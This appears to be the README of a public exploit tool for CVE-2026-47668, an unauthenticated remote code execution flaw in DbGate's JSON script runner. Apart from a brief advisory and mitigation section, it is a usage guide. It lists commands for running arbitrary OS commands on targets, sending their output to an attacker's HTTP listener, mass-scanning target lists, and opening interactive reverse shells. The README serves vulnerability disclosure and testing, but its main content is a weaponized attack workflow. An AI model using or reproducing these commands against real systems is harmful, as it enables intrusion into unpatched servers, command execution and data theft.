Nxploited/CVE-2026-47668

# CVE-2026-47668 — DbGate Remote Code Execution **Unauthenticated RCE in DbGate JSON Script Runner (`dbgate-serve` ≤ 7.1.8).** Assessment tool: **`CVE-2026-47668.py`** — authorized testing only. | | | |---|---| | **CVE** | CVE-2026-47668 | | **Severity** | Critical | | **Product** | DbGate / `dbgate-serve` | | **Affected** | ≤ **7.1.8** | | **Fixed** | ≥ **7.1.9** | | **CVSS 3.1** | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H | | **CWE** | CWE-20, CWE-94, CWE-1188 | ## Vulnerability **Title:** DbGate Unauthenticated Remote Code Execution via JSON Script Runner User-controlled fields (`functionName`, `variableName`) are embedded in dynamically generated JavaScript without proper validation. An attacker can execute arbitrary code in the Node.js runner child process. | Item | Detail | |------|--------| | **Endpoint** | `POST /runners/start` | | **Auth** | Bearer required; token may be obtained via `POST /auth/login` on anonymous/default deployments | | **Injection** | `functionName`, `variableName` in JSON `assign` commands | | **Impact** | OS command execution as the DbGate process user | **Mitigation:** Upgrade to **7.1.9+**. Restrict network access, disable anonymous auth, rotate credentials, review logs for suspicious `/runners/start` activity. ## Contact **Telegram:** [@KNxploited](https://t.me/KNxploited) ## Tool Overview **`CVE-2026-47668.py`** checks and validates exploitation against DbGate instances you are **authorized** to test. **Modes** | Mode | Reverse shell | Description | |------|---------------|-------------| | **AUTO** | No | One prompt; token + HTTP callback + defaults | | **CLI** | Optional | Full control via flags | | **Mass** | No | Scan from `targets.txt` | | **`--reverse-shell`** | Yes | Optional TCP verify (single target only) | **Results** | Result | Meaning | |--------|---------| | **FAIL** | Unreachable, auth failed, or not vulnerable | | **VULN** | Runner accepted probe only | | **DISPATCH** | Payload sent; **no** confirmed output | | **EXFIL** | Callback received — **confirmed command output** | | **REVSH** | Reverse TCP connected (optional mode only) | **Output directory:** `Nx/` (vuln, dispatch, exfil, failed, list_report, per-target files under `exfil/`) ## Install pip install -r requirements.txt **Requires:** Python 3.9+, `aiohttp`, `colorama` ## Usage ### AUTO wizard (default — no reverse shell) python CVE-2026-47668.py | Input at prompt | Example | |-----------------|--------| | Single URL | `http://192.168.1.10:3000` | | URL + command | `http://192.168.1.10:3000\|id` | | Target list | `targets.txt` | ### CLI — enable flag Every CLI run **must** include **`--cli`**. python CVE-2026-47668.py --cli [options] ### Single target **`-u` / `--url`** — target base URL python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 **`--cmd` / `--command`** — shell command (default: `id`) python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "id" python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "uname -a" python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --cmd "ls -la /tmp" **`--check-only`** — vulnerability probe only (no command) python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --check-only **`--vector`** — injection vector: `functionName` \| `variableName` \| `both` python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --vector both --cmd id **`--port`** — default port when URL has no port (default: **3000**) python CVE-2026-47668.py --cli -u http://192.168.1.10 --port 3000 --cmd id **`--token`** — use existing Bearer token python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --token "eyJhbGciOi..." --cmd id **`--login-json`** — custom login body (default: `{"amoid":"none"}`) python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --login-json "{\"amoid\":\"none\"}" --cmd id **`--timeout`** — HTTP timeout in seconds python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --timeout 20 --cmd id **`--secure`** — verify TLS certificates python CVE-2026-47668.py --cli -u https://dbgate.example.com:3000 --secure --cmd id ### Callback / exfil (default in CLI with `--cmd`) **`--callback-host`** — IP/hostname the **target** uses to reach your listener python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --callback-host 192.168.1.5 --cmd id **`--listen-host`** — local bind for HTTP listener (default: `0.0.0.0`) python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-host 0.0.0.0 --cmd id **`--listen-port`** — HTTP exfil port (default: **8888**) python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --listen-port 8888 --cmd id **`-c` / `--callback`** — external callback URL (disables built-in listener) python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 -c http://192.168.1.5:9999/ --cmd id **`--wait-exfil`** — seconds to wait for callback (single target, default: **8**) python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --wait-exfil 15 --cmd id **`--no-b64`** — send output without base64 encoding python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --no-b64 --cmd id **`--async-exec`** — async `exec` instead of `execSync` python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --async-exec --cmd id ### Mass scan (no reverse shell) **`-f` / `--file`** — target list file python CVE-2026-47668.py --cli -f targets.txt --cmd id python CVE-2026-47668.py --cli -f targets.txt --cmd id -t 50 **`--mass-wait-exfil`** — callback wait per target in mass (default: **8**) python CVE-2026-47668.py --cli -f targets.txt --cmd id --mass-wait-exfil 12 **Mass + custom default port** python CVE-2026-47668.py --cli -f targets.txt --port 3000 --cmd "id" ### Reverse shell (optional — single target only) **Not required** for normal testing. Use **HTTP exfil** (`--cmd`) for proof. **`--reverse-shell`** — target connects to `LHOST:LPORT` (omit value = LAN IP + port **4444**) python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 **`--revsh-port`** — port when `--reverse-shell` has no `:port` python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5 --revsh-port 4444 **`--revsh-bind`** — local listen address python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-bind 0.0.0.0 **`--wait-revsh`** — wait for TCP (default: **15**) python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --wait-revsh 20 **`--revsh-interactive`** — basic stdin/stdout relay after connect python CVE-2026-47668.py --cli -u http://192.168.1.10:3000 --reverse-shell 192.168.1.5:4444 --revsh-interactive **Docker note:** use an IP reachable **from the DbGate container** (e.g. host gateway), not `127.0.0.1` on your PC only. ## Target list (`targets.txt`) # comment 192.168.1.10 192.168.1.11:3000 http://10.0.0.8:3000 http://10.0.0.9|uname -a https://dbgate.local|id - **No port** → **3000** applied automatically - **`host|command`** → per-line command override - Report: **`Nx/list_report.txt`** ## Output files | File | Content | |------|---------| | `Nx/vuln.txt` | Vulnerable targets (probe OK) | | `Nx/dispatch.txt` | Payload sent, unconfirmed | | `Nx/exfil.txt` | Confirmed callbacks | | `Nx/failed.txt` | Failed targets | | `Nx/exfil/.txt` | Command output per target | | `Nx/sessions//summary.json` | Session summary | ## Workflow 1. **`POST /auth/login`** → Bearer token (automatic unless `--token`) 2. **Probe** → runner accepts injection 3. **`POST /runners/start`** → run command + HTTP callback (or reverse TCP if enabled) 4. Classify → **EXFIL** = confirmed output ## Disclaimer For **authorized security testing only**. You must have explicit permission to test any system. The author is not responsible for misuse or illegal use. **By: Nxploited**